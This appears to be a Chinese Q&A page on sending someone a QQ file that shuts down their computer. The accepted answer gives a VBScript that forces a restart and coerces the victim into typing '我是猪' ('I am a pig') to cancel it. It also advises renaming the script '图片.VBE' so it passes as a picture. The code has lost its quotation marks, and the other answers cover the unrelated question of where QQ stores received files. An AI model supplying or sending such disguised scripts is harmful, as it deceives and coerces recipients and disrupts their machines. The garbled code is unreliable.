怎么通过QQ发送一个文件让对方电脑立刻关机?

7个回答 默认排序

已采纳
新建TXT文档把下面代码输入on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject(wscript.shell)
WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 说我是猪,不说我是猪就一分钟关你机,不信,试试··· ,0 ,true
dim a
do while(a 我是猪)
a = inputbox (说我是猪,就不关机,快撒,说 我是猪 ,说不说,不说,8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox
loop
msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛
dim WSHshell
set WSHshell = wscript.createobject(wscript.shell)
WSHshell.run cmd.exe /c shutdown -a,0 ,true
msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈,真过瘾保存后重命名为图片.VBE
呵呵 不能那么玩
没听过,找到的话也给我发一下,谢谢

XOK

在电脑端的QQ里。
你好,一般路径是D:\Documents\Tencent Files\519920551\FileRecv\ 有的可能不一样,建议打开QQ面板设置,文件设置查看,或者登陆手机QQ查看记录点打开,记住路径。祝你好运
在你安装QQ的那个目录下 有个USER文件夹 里面有你账号的那个文件夹里
1.电脑上登陆QQ聊天软件!

2.如果QQ界面上联系人界面还有我的设备的话,我们就在我的设备上单击鼠标右键,选择打开接收文件夹!

3.我们这里就可以看到手机上传的文件了!大家可以仔细看看是在电脑上那个文件夹中,以后使用就方便了!

4.如果那个地方没有我的设备如何找到手机传到电脑的文件呢?我们可以点击界面上的打开系统设置按钮!

5.然后点击文件管理中的打开文件夹!

6.我们电脑通过手机上传的文件就都在这个文件夹中了!

7.如果我们点击界面上的打开个人文件夹的话,我们就可以查看自己QQ号码中的文件了!